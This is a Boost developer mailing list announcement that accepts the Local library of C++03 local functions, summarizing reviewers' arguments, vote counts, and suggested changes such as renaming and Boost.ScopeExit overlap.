As a result, you now have these nice performance metrics and charts available for all the services in your app. Most noteworthy this was done without a code change and can be enabled or disabled simply through environment variables.
|
https://blog.openshift.com/performance-metrics-apm-spring-boot-microservices-openshift/
|
CC-MAIN-2017-13
|
refinedweb
| 1,112
| 50.97
|
/* * ndef lint static const char sccsid[] = "@(#)termstat.c 8.2 (Berkeley) 5/30/95"; #endif #endif #include <sys/cdefs.h> __FBSDID("$FreeBSD: src/contrib/telnet/telnetd/termstat.c,v 1.13 2004/07/28 05:37:18 kan Exp $"); #include "telnetd.h" #ifdef ENCRYPTION #include <libtelnet/encrypt.h> #endif /* * local variables */ int def_tspeed = -1, def_rspeed = -1; #ifdef TIOCSWINSZ int def_row = 0, def_col = 0; #endif #ifdef LINEMODE static int _terminit = 0; #endif /* LINEMODE */ #ifdef LINEMODE /* * localstat * * This function handles all management of linemode. * * Linemode allows the client to do the local editing of data * and send only complete lines to the server. Linemode state is * based on the state of the pty driver. If the pty is set for * external processing, then we can use linemode. Further, if we * can use real linemode, then we can look at the edit control bits * in the pty to determine what editing the client should do. * * Linemode support uses the following state flags to keep track of * current and desired linemode state. * alwayslinemode : true if -l was specified on the telnetd * command line. It means to have linemode on as much as * possible. * * lmodetype: signifies whether the client can * handle real linemode, or if use of kludgeomatic linemode * is preferred. It will be set to one of the following: * REAL_LINEMODE : use linemode option * NO_KLUDGE : don't initiate kludge linemode. * KLUDGE_LINEMODE : use kludge linemode * NO_LINEMODE : client is ignorant of linemode * * linemode, uselinemode : linemode is true if linemode * is currently on, uselinemode is the state that we wish * to be in. If another function wishes to turn linemode * on or off, it sets or clears uselinemode. * * editmode, useeditmode : like linemode/uselinemode, but * these contain the edit mode states (edit and trapsig). * * The state variables correspond to some of the state information * in the pty. * linemode: * In real linemode, this corresponds to whether the pty * expects external processing of incoming data. * In kludge linemode, this more closely corresponds to the * whether normal processing is on or not. (ICANON in * system V, or COOKED mode in BSD.) * If the -l option was specified (alwayslinemode), then * an attempt is made to force external processing on at * all times. * * The following heuristics are applied to determine linemode * handling within the server. * 1) Early on in starting up the server, an attempt is made * to negotiate the linemode option. If this succeeds * then lmodetype is set to REAL_LINEMODE and all linemode * processing occurs in the context of the linemode option. * 2) If the attempt to negotiate the linemode option failed, * and the "-k" (don't initiate kludge linemode) isn't set, * then we try to use kludge linemode. We test for this * capability by sending "do Timing Mark". If a positive * response comes back, then we assume that the client * understands kludge linemode (ech!) and the * lmodetype flag is set to KLUDGE_LINEMODE. * 3) Otherwise, linemode is not supported at all and * lmodetype remains set to NO_LINEMODE (which happens * to be 0 for convenience). * 4) At any time a command arrives that implies a higher * state of linemode support in the client, we move to that * linemode support. * * A short explanation of kludge linemode is in order here. * 1) The heuristic to determine support for kludge linemode * is to send a do timing mark. We assume that a client * that supports timing marks also supports kludge linemode. * A risky proposition at best. * 2) Further negotiation of linemode is done by changing the * the server's state regarding SGA. If server will SGA, * then linemode is off, if server won't SGA, then linemode * is on. */ void localstat(void) { int need_will_echo = 0; /* * Check for changes to flow control if client supports it. */ flowstat(); /* * Check linemode on/off state */ uselinemode = tty_linemode(); /* * If alwayslinemode is on, and pty is changing to turn it off, then * force linemode back on. */ if (alwayslinemode && linemode && !uselinemode) { uselinemode = 1; tty_setlinemode(uselinemode); } if (uselinemode) { /* * Check for state of BINARY options. * * We only need to do the binary dance if we are actually going * to use linemode. As this confuses some telnet clients * that don't support linemode, and doesn't gain us * anything, we don't do it unless we're doing linemode. * -Crh (henrich@msu.edu) */ if (tty_isbinaryin()) { if (his_want_state_is_wont(TELOPT_BINARY)) send_do(TELOPT_BINARY, 1); } else { if (his_want_state_is_will(TELOPT_BINARY)) send_dont(TELOPT_BINARY, 1); } if (tty_isbinaryout()) { if (my_want_state_is_wont(TELOPT_BINARY)) send_will(TELOPT_BINARY, 1); } else { if (my_want_state_is_will(TELOPT_BINARY)) send_wont(TELOPT_BINARY, 1); } } #ifdef ENCRYPTION /* * If the terminal is not echoing, but editing is enabled, * something like password input is going to happen, so * if we the other side is not currently sending encrypted * data, ask the other side to start encrypting. */ if (his_state_is_will(TELOPT_ENCRYPT)) { static int enc_passwd = 0; if (uselinemode && !tty_isecho() && tty_isediting() && (enc_passwd == 0) && !decrypt_input) { encrypt_send_request_start(); enc_passwd = 1; } else if (enc_passwd) { encrypt_send_request_end(); enc_passwd = 0; } } #endif /* ENCRYPTION */ /* * Do echo mode handling as soon as we know what the * linemode is going to be. * If the pty has echo turned off, then tell the client that * the server will echo. If echo is on, then the server * will echo if in character mode, but in linemode the * client should do local echoing. The state machine will * not send anything if it is unnecessary, so don't worry * about that here. * * If we need to send the WILL ECHO (because echo is off), * then delay that until after we have changed the MODE. * This way, when the user is turning off both editing * and echo, the client will get editing turned off first. * This keeps the client from going into encryption mode * and then right back out if it is doing auto-encryption * when passwords are being typed. */ if (uselinemode) { if (tty_isecho()) send_wont(TELOPT_ECHO, 1); else need_will_echo = 1; #ifdef KLUDGELINEMODE if (lmodetype == KLUDGE_OK) lmodetype = KLUDGE_LINEMODE; #endif } /* * If linemode is being turned off, send appropriate * command and then we're all done. */ if (!uselinemode && linemode) { # ifdef KLUDGELINEMODE if (lmodetype == REAL_LINEMODE) { # endif /* KLUDGELINEMODE */ send_dont(TELOPT_LINEMODE, 1); # ifdef KLUDGELINEMODE } else if (lmodetype == KLUDGE_LINEMODE) send_will(TELOPT_SGA, 1); # endif /* KLUDGELINEMODE */ send_will(TELOPT_ECHO, 1); linemode = uselinemode; goto done; } # ifdef KLUDGELINEMODE /* * If using real linemode check edit modes for possible later use. * If we are in kludge linemode, do the SGA negotiation. */ if (lmodetype == REAL_LINEM; # ifdef KLUDGELINEMODE } else if (lmodetype == KLUDGE_LINEMODE) { if (tty_isediting() && uselinemode) send_wont(TELOPT_SGA, 1); else send_will(TELOPT_SGA, 1); } # endif /* KLUDGELINEMODE */ /* * Negotiate linemode on if pty state has changed to turn it on. * Send appropriate command and send along edit mode, then all done. */ if (uselinemode && !linemode) { # ifdef KLUDGELINEMODE if (lmodetype == KLUDGE_LINEMODE) { send_wont(TELOPT_SGA, 1); } else if (lmodetype == REAL_LINEMODE) { # endif /* KLUDGELINEMODE */ send_do(TELOPT_LINEMODE, 1); /* send along edit modes */ output_data("%c%c%c%c%c%c%c", IAC, SB, TELOPT_LINEMODE, LM_MODE, useeditmode, IAC, SE); editmode = useeditmode; # ifdef KLUDGELINEMODE } # endif /* KLUDGELINEMODE */ linemode = uselinemode; goto done; } # ifdef KLUDGELINEMODE /* * None of what follows is of any value if not using * real linemode. */ if (lmodetype < REAL_LINEMODE) goto done; # endif /* KLUDGELINEMODE */ if (linemode && his_state_is_will(TELOPT_LINEMODE)) { /* * If edit mode changed, send edit mode. */ if (useeditmode != editmode) { /* * Send along appropriate edit mode mask. */ output_data("%c%c%c%c%c%c%c", IAC, SB, TELOPT_LINEMODE, LM_MODE, useeditmode, IAC, SE); editmode = useeditmode; } /* * Check for changes to special characters in use. */ start_slc(0); check_slc(); (void) end_slc(0); } done: if (need_will_echo) send_will(TELOPT_ECHO, 1); /* * Some things should be deferred until after the pty state has * been set by the local process. Do those things that have been * deferred now. This only happens once. */ if (_terminit == 0) { _terminit = 1; defer_terminit(); } netflush(); set_termbuf(); return; } /* end of localstat */ #endif /* LINEMODE */ /* * flowstat * * Check for changes to flow control */ void flowstat(void) { if (his_state_is_will(TELOPT_LFLOW)) { if (tty_flowmode() != flowmode) { flowmode = tty_flowmode(); output_data("%c%c%c%c%c%c", IAC, SB, TELOPT_LFLOW, flowmode ? LFLOW_ON : LFLOW_OFF, IAC, SE); } if (tty_restartany() != restartany) { restartany = tty_restartany(); output_data("%c%c%c%c%c%c", IAC, SB, TELOPT_LFLOW, restartany ? LFLOW_RESTART_ANY : LFLOW_RESTART_XON, IAC, SE); } } } /* * clientstat * * Process linemode related requests from the client. * Client can request a change to only one of linemode, editmode or slc's * at a time, and if using kludge linemode, then only linemode may be * affected. */ void clientstat(int code, int parm1, int parm2) { /* * Get a copy of terminal characteristics. */ init_termbuf(); /* * Process request from client. code tells what it is. */ switch (code) { #ifdef LINEMODE case TELOPT_LINEMODE: /* * Don't do anything unless client is asking us to change * modes. */ uselinemode = (parm1 == WILL); if (uselinemode != linemode) { # ifdef KLUDGELINEMODE /* * If using kludge linemode, make sure that * we can do what the client asks. * We can not turn off linemode if alwayslinemode * and the ICANON bit is set. */ if (lmodetype == KLUDGE_LINEMODE) { if (alwayslinemode && tty_isediting()) { uselinemode = 1; } } /* * Quit now if we can't do it. */ if (uselinemode == linemode) return; /* * If using real linemode and linemode is being * turned on, send along the edit mode mask. */ if (lmodetype == REAL_LINEMODE && uselinemode) # else /* KLUDGELINEMODE */ if (uselinem; output_data("%c%c%c%c%c%c%c", IAC, SB, TELOPT_LINEMODE, LM_MODE, useeditmode, IAC, SE); editmode = useeditmode; } tty_setlinemode(uselinemode); linemode = uselinemode; if (!linemode) send_will(TELOPT_ECHO, 1); } break; case LM_MODE: { int ack, changed; /* * Client has sent along a mode mask. If it agrees with * what we are currently doing, ignore it; if not, it could * be viewed as a request to change. Note that the server * will change to the modes in an ack if it is different from * what we currently have, but we will not ack the ack. */ useeditmode &= MODE_MASK; ack = (useeditmode & MODE_ACK); useeditmode &= ~MODE_ACK; if ((changed = (useeditmode ^ editmode))) { /* * This check is for a timing problem. If the * state of the tty has changed (due to the user * application) we need to process that info * before we write in the state contained in the * ack!!! This gets out the new MODE request, * and when the ack to that command comes back * we'll set it and be in the right mode. */ if (ack) localstat(); if (changed & MODE_EDIT) tty_setedit(useeditmode & MODE_EDIT); if (changed & MODE_TRAPSIG) tty_setsig(useeditmode & MODE_TRAPSIG); if (changed & MODE_SOFT_TAB) tty_setsofttab(useeditmode & MODE_SOFT_TAB); if (changed & MODE_LIT_ECHO) tty_setlitecho(useeditmode & MODE_LIT_ECHO); set_termbuf(); if (!ack) { output_data("%c%c%c%c%c%c%c", IAC, SB, TELOPT_LINEMODE, LM_MODE, useeditmode|MODE_ACK, IAC, SE); } editmode = useeditmode; } break; } /* end of case LM_MODE */ #endif /* LINEMODE */ case TELOPT_NAWS: #ifdef TIOCSWINSZ { struct winsize ws; def_col = parm1; def_row = parm2; #ifdef LINEMODE /* * Defer changing window size until after terminal is * initialized. */ if (terminit() == 0) return; #endif /* LINEMODE */ /* * Change window size as requested by client. */ ws.ws_col = parm1; ws.ws_row = parm2; (void) ioctl(spty, TIOCSWINSZ, (char *)&ws); } #endif /* TIOCSWINSZ */ break; case TELOPT_TSPEED: { def_tspeed = parm1; def_rspeed = parm2; #ifdef LINEMODE /* * Defer changing the terminal speed. */ if (terminit() == 0) return; #endif /* LINEMODE */ /* * Change terminal speed as requested by client. * We set the receive speed first, so that if we can't * store separate receive and transmit speeds, the transmit * speed will take precedence. */ tty_rspeed(parm2); tty_tspeed(parm1); set_termbuf(); break; } /* end of case TELOPT_TSPEED */ default: /* What? */ break; } /* end of switch */ netflush(); } /* end of clientstat */ #ifdef LINEMODE /* * defer_terminit * * Some things should not be done until after the login process has started * and all the pty modes are set to what they are supposed to be. This * function is called when the pty state has been processed for the first time. * It calls other functions that do things that were deferred in each module. */ void defer_terminit(void) { /* * local stuff that got deferred. */ if (def_tspeed != -1) { clientstat(TELOPT_TSPEED, def_tspeed, def_rspeed); def_tspeed = def_rspeed = 0; } #ifdef TIOCSWINSZ if (def_col || def_row) { struct winsize ws; memset((char *)&ws, 0, sizeof(ws)); ws.ws_col = def_col; ws.ws_row = def_row; (void) ioctl(spty, TIOCSWINSZ, (char *)&ws); } #endif /* * The only other module that currently defers anything. */ deferslc(); } /* end of defer_terminit */ /* * terminit * * Returns true if the pty state has been processed yet. */ int terminit(void) { return(_terminit); } /* end of terminit */ #endif /* LINEMODE */
|
http://opensource.apple.com//source/remote_cmds/remote_cmds-31/telnetd.tproj/termstat.c
|
CC-MAIN-2016-36
|
refinedweb
| 1,916
| 62.68
|
/* * _SIMACCESS_H #define _EAP8021X_SIMACCESS_H /* * Modification History * * January 15, 2009 Dieter Siegmund (dieter@apple.com) * - created */ /* * SIMAccess.h * - API's to access the SIM */ #include <stdint.h> #include <stdbool.h> #define SIM_KC_SIZE 8 #define SIM_SRES_SIZE 4 #define SIM_RAND_SIZE 16 /* * Function: SIMProcessRAND * Purpose: * Communicate with SIM to retrieve the (SRES, Kc) pairs for the given * set of RANDs. * Parameters: * rand_p input buffer containing RANDs; * size must be at least 'count' * SIM_RAND_SIZE * count the number of values in rand_p, kc_p, and sres_p * kc_p output buffer to return Kc values; * size must be at least 'count' * SIM_KC_SIZE * sres_p output buffer to return SRES values; * size must be at least 'count' * SIM_SRES_SIZE * Returns: * TRUE if RANDS were processed and kc_p and sres_p were filled in, * FALSE on failure. */ bool SIMProcessRAND(const uint8_t * rand_p, int count, uint8_t * kc_p, uint8_t * sres_p); #endif _EAP8021X_SIMACCESS_H
|
http://opensource.apple.com//source/eap8021x/eap8021x-100.1/EAP8021X.fproj/SIMAccess.h
|
CC-MAIN-2016-36
|
refinedweb
| 135
| 52.9
|
I need to inventory the hardware on some Linux clients I recently "inherited". In the past, on Windows, I've used the excellent CPU-z to generate the hardware inventory. Is there a Linux can use CPU-G, see the example
here
you can use CPU-G, see the example
here
CPU-G is an application that shows useful information about your hardware. It collects and displays information about your CPU, RAM, Motherboard, some general information about your system and more
% dmidecode
% cat /proc/cpuinfo
% lspci -vvv
As root will all show you info about both CPU and memory, you might want to run update-pciids prior to some of those commands in download the newest version of the PCI ID list to ensure everything reports your hardware correctly.
update-pciids
Other answers about /proc/cpuinfo, lspci, dmidecode and other tools are helpful. I would try to get away with them first if I could.
/proc/cpuinfo
lspci
dmidecode
But for big jobs, HAL is the major mechanism to enumerate and identify hardware on Linux. Strictly, speaking, HAL is an API accessible over the system DBus, but there are command-line tools to make HAL information available for human or script consumption.
To start out, try this:
$ lshal
The UDI is a namespace within HAL for all devices in your system. Everything else is key/value pairs where the keys are in a hierarchy defined in the HAL specification
I'm not familiar with CPU-z, but if you are interested in CPU information, search or grep for info.category = 'processor' which will give you a list of processors on the system, the manufacturer, whether they can throttle, etc. In general, info.category is the basic grouping of devices (battery, AC adapter, disk, etc.)
info.category = 'processor'
info.category
% cat /proc/cpuinfo
% dmidecode
x86info can decode CPU features and display them in human readable from.
You can list all hardware using
lshw
or
lspci
asked
5 years ago
viewed
3426 times
active
3 years ago
|
http://serverfault.com/questions/3552/is-there-a-linux-equivalent-of-cpu-z/3579
|
CC-MAIN-2015-06
|
refinedweb
| 335
| 51.38
|
21 January 2005 03:59 [Source: ICIS news]
?xml:namespace>
This increase was helped by a jump in total income for the three months to Rs1.901bn from the Rs1.589bn, the company said in a statement to the Bombay Stock Exchange after a board meeting on Thursday.
?xml:namespace>
On Thursday, the board approved a proposal to incorporate a wholly-owned subsidiary, BASF Polyurethanes, to manufacture and market its polyurethane (PU) products. This company would have a paid-up capital of not more than Rs100m.
The company said that a subsidiary would allow it to give more focus to the PU business, which currently accounts for only 2% of the company’s sales.
BASF India has three divisions, with the plastics and fibres division producing PU, expanded polystyrene (EPS) and engineering plastics. The performance products division produces synthetic leather and textile chemicals, while the agricultural and nutrition division produces pesticides and fine chemicals.
The company is a publicly traded subsidiary of German chemicals major BASF, which has a 50% share in.
|
http://www.icis.com/Articles/2005/01/21/645495/basf+india+posts+29.91+year-on-year+rise+in+3q+net.html
|
CC-MAIN-2013-20
|
refinedweb
| 172
| 54.83
|
Hello,
Im new to this forum and I really need help with this newbie problem. I've been struggling with this assignment for very long now. I'm not even sure how to start the code right, as well as the structure of it. My code is a complete mess, and Im not sure what I'm brainstorming here. Any help is appreciated. Here's whats being asked of me:
In a loop your program should do the following (you can use a do/while):
receive as data input the weights (proportions) for the four exam grades, and put these into an array called weights.
Read in 4 test grades into another array called grades.
Use the following test data for one example:
weights for exams: .10, .20, .25, .45
first student record: 75, 87, 79, 92
make up the rest yourself.
call the function isitvalid() passing in the grades array, the function returns a bool (i.e. a boolean value).
The function isitvalid() will determine whether or not the values in this array are valid. It will return true/1 for valid and false/0 if it's invalid. The function will return invalid if any grade in the array is not a valid grade (i.e. it's greater than 100 or less than 0). If the function returns false, your main program should read 4 values into the grades array again.
You should calculate and print the final grade, which is the weighted average.
Next your program will allow the user to see the any number of their test scores. For example. Your program can display a message such as: "If you don't believe the score is correct, how many of your grades would you like to see?", and it should call a function printarray() which takes two parameters, the array, and the number of grades the user would like to see..
The function printarray() does not return anything, it will print out the number of grades the user would like to see. For example if the user passed the number 2, it will print the first two grades from the grades array.
Your program will ask the user if s/he would like to enter another student.
At the end of your program, you should print the class average i.e. the average of all the final grades combined.
Here's what i got so far:
Yes, evidently Im very confused. Please help!Yes, evidently Im very confused. Please help!Code:#include <iostream> #include <fstream> #include <math.h> using namespace std; bool isitvalid(double grades[]); void printarray(); int main(){ double weights[4], grades[4]; do { for (int i = 0; i < 4; i++){ cout << "weight " << i << " :"; cin >> weights[i]; } for (int k = 0; k < 4; k++){ cout << "grade: " << k ; cin >> grades[k]; } } while (cin); } bool isitvalid(double grades[]){ int k; bool cond = 0; if (grades[k] >= 0 && grades[k] <= 100){ cond = 1; }else{ cond = 0; return cond; } } } void printarray() cin >> k
|
http://cboard.cprogramming.com/cplusplus-programming/85801-please-help-arrays-bool.html
|
CC-MAIN-2015-18
|
refinedweb
| 495
| 80.51
|
I was asked to write a program to assign seats on a plane. Their are ten seats on a plane and I must use an array to fill up each seat. The input is "1 for smoking" and "2 for non-smoking." How am i suppose to assign the seats on the plane? Here is what i got:
#include <iostream.h>
#include <cmath>
int main()
{
int i, plane, seat[10];
cout<<"This program will assign you seats in the airplane."<<endl;
do
{
cout<<"Please type 1 for ''smoking''"<<endl;
cout<<"Please type 2 for ''non-smoking''"<<endl;
cin>>seat[i];
for (i=0;i<10;i++)
if (seat[i]==1)
cin>>seat[i];
else if (seat[i]==2)
{
cin>>seat[i];
cout<<"Your seat assignment is "<<seat[5]<<" (non-smoking section)"<<endl;
}
else
cout<<"Next flight leaves in 3 hours"<<endl;
}while(i<10);
return 0;
}
//now i am getting an error after this so i'm really not sure what to do. Please HELP!
Assigning and declaring arrays and elements.
Page 1 of 1
Assigning and declaring arrays and eleme
4 Replies - 2240 Views - Last Post: 23 November 2005 - 02:10 PM
#1
Assigning and declaring arrays and elements.
Posted 23 November 2005 - 02:17 AM
Replies To: Assigning and declaring arrays and elements.
#2
Re: Assigning and declaring arrays and elements.
Posted 23 November 2005 - 04:38 AM
cout<<"Please type 1 for ''smoking''"<<endl;
this line will generate an error as you cannot have "'s in a string like that, you have to use the '\"' character to denote a double quote insinde of a string
cout<<"Please type 1 for \''smoking\''"<<endl;
as for filling the seats...do you have to fill each seat, one at a time, or keep requesting "smoking" or "non-smoking" from the user until all the seats are filled up. is part of the array supposed to be designated for smoking and the other part to be non-smoking only?
#3
Re: Assigning and declaring arrays and elements.
Posted 23 November 2005 - 11:40 AM
Yes, I suppose to keep asking the user to input smoking or nonsmoking until all seats are full. I was thinking of using a do-while loop to keep asking the same question. But what I don't understand is how can I keep looping that question and fill up each array element with a passenger.
#4
Re: Assigning and declaring arrays and elements.
Posted 23 November 2005 - 11:44 AM
and also, yes, only arrays [0]-[4] are non-smoking and arrays [5]-[9] should be for smoking. Once all of smoking or non-smoking is filled up, it should output something like, "The smoking section is full, would you like to sit in the smoking section(y or n). And for this I would use an "if" statement I believe. And if they choose "n" it will output "next flight leaves in 3 hours."
#5
Re: Assigning and declaring arrays and elements.
Posted 23 November 2005 - 02:10 PM
I'd do something like this then:
Something like that.
There is some psuedocode in, so you'll still have to do some thinking...
#define TOTAL_SEATS 10 //total number of seats #define START_SMOKING_SEATS 5 //what seat number and up are smoking unsigned char smoking = 0; unsigned char nonsmoking = 0; unsigned char seats[TOTAL_SEATS]; do { // cout code if (input_smoking) { if (smoking > (TOTAL_SEATS-START_SMOKING_SEATS)) { // no more smoking seats } else { seats[smoking+START_SMOKING_SEATS] = 2; // 2 = smoking smoking++; } } else if (input_nonsmoking) { if (nonsmoking == START_SMOKING_SEATS) { // no more non-smoking seats } else { seats[nonsmoking] = 1; // 1 = smoking nonsmoking++; } } } while ((smoking+nonsmoking) != TOTAL_SEATS);
Something like that.
There is some psuedocode in, so you'll still have to do some thinking...
This post has been edited by microchip: 23 November 2005 - 02:11 PM
Page 1 of 1
|
http://www.dreamincode.net/forums/topic/13400-assigning-and-declaring-arrays-and-elements/
|
CC-MAIN-2017-39
|
refinedweb
| 634
| 69.11
|
#include <stdio.h>
#include <stdlib.h>
int i=0;
int main(void) {
printf("input:");
scanf("%d", &i);
printf("\nhey dude, %d\n", i);
puts("!!!Hello World!!!"); /* prints !!!Hello World!!! */
return EXIT_SUCCESS;
}
5 // this was my input in console
input:
hey dude, 5
!!!Hello World!!!
[Updated on: Thu, 29 March 2012 10:35]
Report message to a moderator
Oh, my bad...Is it normal that I've to add after every printf a fflush(stdout)? I had experiences running gdb in terminal and I didn't need that, and I'm pretty sure that when I've used eclipse in past it wasn't needed...
|
http://www.eclipse.org/forums/index.php/t/318997/
|
CC-MAIN-2014-35
|
refinedweb
| 104
| 73.68
|
Creating properties from as3christoferek Jun 15, 2009 1:09 PM
Hi All,
I have
<mx:Canvas
so there are no properties in this component.
I want to add a new component now:
var itemPicX:Bitmap = new Bitmap();
var wrapperX:UIComponent = new UIComponent();
wrapperX.addChild(itemPicX);
wrapperX.name = "first picture";
wrapperX.id = "itemPicX";
Application.application.prepBlobs.addChild(wrapperX);
Application.application.prepBlobs.itemPicX.visible = true;
This fails with the error: Error #1069: Property itemPicX not found on mx.containers.Canvas and there is no default value.
What am I doing wrong?
I did all of this because I want to loop all the elements within the canvas. I want to create them at the beginning of the loop and remove all of them using prepBlobs.removeAllChildren at and the end of the loop.
Christopherek
1. Re: Creating properties from as3leybniz Jun 15, 2009 10:26 PM (in response to christoferek)
Application.application.prepBlobs.itemPicX.visible = true
itemPicX - is not a property of Canvas.
If you want to iterate through Canvas childs, use this one loop:
for each (var d:DisplayObject in prepBlobs.getChildren())
If you feel this message answers your question or helps, please mark it respectively
2. Re: Creating properties from as3christoferek Jun 16, 2009 12:11 AM (in response to leybniz)
Hi Alex,
Thank you for your answer.
To be fully happy I want to know how I make itemPicX to be the property of the canvas and use it like this Application.application.xxx.yyy
That makes the most difficult problem to me.
Chris
3. Re: Creating properties from as3leybniz Jun 16, 2009 12:31 AM (in response to christoferek)
Why do you need it to be a property? Actually the use of Application.application is discouraged, so it would be better to go with something else.
for example you could come up with your own modelHolderClass, which will contains all the references you need elsewere in the code.
public
private
public var itemPicX:DisplayObject;
function ModelLocator() {
if (instance)
throw new Error('Error instance already exists', getQualifiedClassName(this));
}
public static function getInstance():ModelLocator {
if (!instance)
instance = new ModelLocator();
return instance;
}
}
And you are using it like this:
Inside your Application tag
ModelLocator.getInstance().itemPicX = new Image(); and so on..
anywhere in the code access this property using the same line of code:
ModelLocator.getInstance().itemPicX
4. Re: Creating properties from as3christoferek Jun 16, 2009 1:04 AM (in response to leybniz)
Hi Alex,
Thank you for your kind answer.
I want a simple thing to do:
Create a canvas, add some children like html component, add pictures to it as children, take a snapshot of the result and then remove all the children from the canvas. And repeat all this again a few times.
Using Application.application.prepBlobs.children makes it easy to use Application.application.prepBlobs.removeAllChildren for clearing the stage.
prepBlobs is a canvas created in MXML and all other children are created dynamicaly by as3. (or I overlooked something and my thinking goes in wrong direction).
I noticed that having images created by MXML is easier to add as a child to the canvas but after deleting there is no way to recreate them (images) as MXML. That's the point and my thinking went into using as3 to create all the needed children.
Is my idea correct?
Chris
5. Re: Creating properties from as3leybniz Jun 16, 2009 9:12 AM (in response to christoferek)
I have an better Idea for you,
why don't you create your very own Canvas Descendant class in pure AS3 and put all logic inside of it?
something like this:
public class YourCanvas extends Canvas {
public function addStuffToCanvas(stuff:*):void {
}
public function cleanCanvas():void {
this.removeAllChildren();
}
public function takeASnapshot():BitmapData {
return snapshot data;
}
}
If you feel this message answers your question or helps, please mark it respectively
6. Re: Creating properties from as3christoferek Jun 18, 2009 12:58 AM (in response to leybniz)
Hi Alex,
You are great.
I have just implemented your idea.
Your soulution simplifies a few problems and works like a charm.
Thank you.
Chris
|
https://forums.adobe.com/thread/448490
|
CC-MAIN-2018-30
|
refinedweb
| 678
| 56.05
|
Subject: [Boost-announce] [boost] [review] [Local] Review Result - ACCEPTED
From: Jeffrey Lee Hellrung, Jr. (jeffrey.hellrung_at_[hidden])
Date: 2011-12-12 03:15:19
Local is ACCEPTED into Boost.
After following the lively Local review discussion several weeks ago, and
reviewing the discussion a second (and sometimes third) time, I have come
to the above conclusion. There was quite a bit of passion on both the sides
of "aisle", and thus, obviously, no decision I make would be well-received
by all.
Let me start by summarizing the main arguments against including Local in
Boost:
(a) Local functions are not very useful, at least in the presence of
existing alternatives (e.g., namespace functions and Boost.Phoenix).
(b) Local is really a portability library for C++03 presenting an imperfect
emulation of features readily available in C++11.
(c) Local's interface is primarily macro-based, making code ugly and
difficult to read.
In my opinion as the review manager, a sufficient number of individuals in
the discussion found the library "useful" to address (a) (sometimes with
additional positive adverbs); indeed, at least a couple individuals have
shared positive experiences with real-world use. Namespace functions
require one to move code to somewhere other than where one may prefer to
have it, and often requires a significant amount of boilerplate when
binding local variables. Aside from any perceived issues with
Boost.Phoenix's syntax and compiler error messages, it has been noted that
binding member functions within Boost.Phoenix can get ugly. As far as (b)
is concerned, the community seems pretty far from reaching a consensus on
whether a library described by (b) belongs in Boost. There are certainly
libraries currently in Boost that could be pegged to satisfy (b) as well,
though they all have other mitigating features they make their situation
different from Local in some way. As far as (c) is concerned, several have
acknowledged that a macro-based interface is necessary to implement local
functions in C++03, and it seems to have been generally agreed that, given
this limitation, Lorenzo has done an admireable job making the interface as
easy-to-use as possible. Some find it ugly, others find it reasonable.
In addition to the counterarguments of (a-c) above, the following facts
weighed into my final decision:
* Lorenzo has been engaging and in constant communication with the
developer's list during the development of Local. This gives me confidence
that he will continue to actively maintain (and improve?) Local.
* The documentation is unanimously agreed to be of Boost quality.
* The transition of some organizations from C++03 to C++11 may take several
more years, and Boost has a history of supporting "ancient" compilers (for
better or worse). The point being, a library that eases the transition from
C++03 to C++11 has some merit based on current precedent.
* There had been previous work on local functions by Alexander Nasanov and
Steven Watanabe shared on the developer's list, suggesting a desire for
this functionality for some time.
* Local is approximately an extension of Boost.ScopeExit; indeed, it
basically fulfills the request to Alexander Nasanov from the review result
[2] of Boost.ScopeExit to create such an extension.
Lastly, my own opinion of "what Boost is" factored in here. I view Boost as
*partly* a collection of general purpose libraries that can be used in wide
variety of applications (and thus Boost frequently acts as a staging ground
for standard adoption). Based on review feedback, I believe Local satisfies
this criterion; and based on the mailing list discussion, I believe this
view of Boost is not entirely inconsistent with others on the mailing list.
Ultimately, it wasn't so much a # of "yes" votes versus # of "no" votes as
it was the above general considerations. Regardless, I think independent of
how the votes were counted, the "yes" votes outnumbered the "no" votes.
This required some discretion on my part as not everyone who expressed an
opinion submitted a formal review, and some participants were only arguing
in favor of some specific point supporting either acceptance or rejection
of Local.
"Yes" reviews (7)
--------
Krzysztof Czainski
Andrzej Krzemienski
Pierre Morcello
Nat Lindon
John Bytheway
Edward Diener
Gregory Crosswhite
"No" reviews (3)
--------
Vicente J. Botet
Thomas Heller
Hartmut Kaiser
Paul A. Bristow and Alexander Nasanov (the author of Boost.ScopeExit) both
submitted reviews but did not express an opinion (as far as I could tell)
on whether Local should be included in Boost, though if I had to peg
Paul's, it would be to reject Local. From what I gathered, Joel de Guzman,
Joel Falcou, Dean Michael Berris, and Lucanus J. Simonson were opposed to
including Local in Boost (the aforementioned did not submit a formal
review, though a formal review might be unnecessary if your vote is "no").
On the other hand, Brian Wood, Philippe Vaucher, Mathias Gaunard, Robert
Ramey, Nathan Ridge, Brent Spillner, Thomas Klimpel, Christopher Jefferson,
Daniel James, Rafael Fourquet, Matthias Schabel, and Robert Stewart
participated in the discussion and argued in favor of some point that
supported accepting Local in Boost. I want to be clear here that certainly
not everyone in the aforementioned list even implied that they supported
acceptance of Local (I would guess that only roughly half implied as much),
but they indirectly helped its case by addressing arguments against
inclusion. Overall, that indicates to me that more individuals support
acceptance of Local into Boost than rejection.
[Apologies for any name misspellings and absent accents.]
Regarding Boost.ScopeExit: 4 reviews were in favor of deprecating
Boost.ScopeExit; 3 reviews felt there was nothing wrong with both
Boost.ScopeExit and Local coexisting; and 3 reviews mentioned the
possibility of improving Boost.ScopeExit with the features provided by
Local's exits. As such I'm inclined to let Alexander (who opposed any kind
of merging of Local and Boost.ScopeExit) work with Lorenzo on improving
Boost.ScopeExit as he sees fit, and hopefully both libraries can address
this apparent duplication of functionality within their respective
documentation to avoid user confusion.
Regarding local::function::overload: Based on the review comments, it makes
the most sense to add this to Boost.Functional.
Regarding BOOST_IDENTITY_TYPE: This should be added to Boost.Utility. On
the other hand, there doesn't appear to be a compelling use case for
BOOST_IDENTITY_VALUE.
The following are some suggested *possible* improvements that reviewers
brought up. This list is by no means exhaustive. Further, I personally
don't think all of these suggestions are necessarily "good", but I think
it's fair for Lorenzo (and the community) to consider them nonetheless.
Parenthetic comments are my own opinions.
* Some aren't convinced of the utility of LOCAL_BLOCK. (It's use cases
appear fairly narrow so it might be best to simplify the library and remove
this capability.)
* Use "this_" (as opposed to "_this") as an alias for "this" within
function bodies, and possibly also within bind declarations.
* Present Boost.PP sequence interface as a workaround for the variadic
interface? (I don't have a problem with supporting both interfaces at the
top level.)
* "Local" and "Locale" look too much alike, suggesting a name change to
"Scope", "Scoped", "LocalFunction", "Closure" may be a good idea?
* Allow use without dependence on Boost.TypeOf.
* Rename prefix and postfix macros from XXX_PARAMS/XXX_NAME to XXX/XXX_END?
(I don't mind the current macros.)
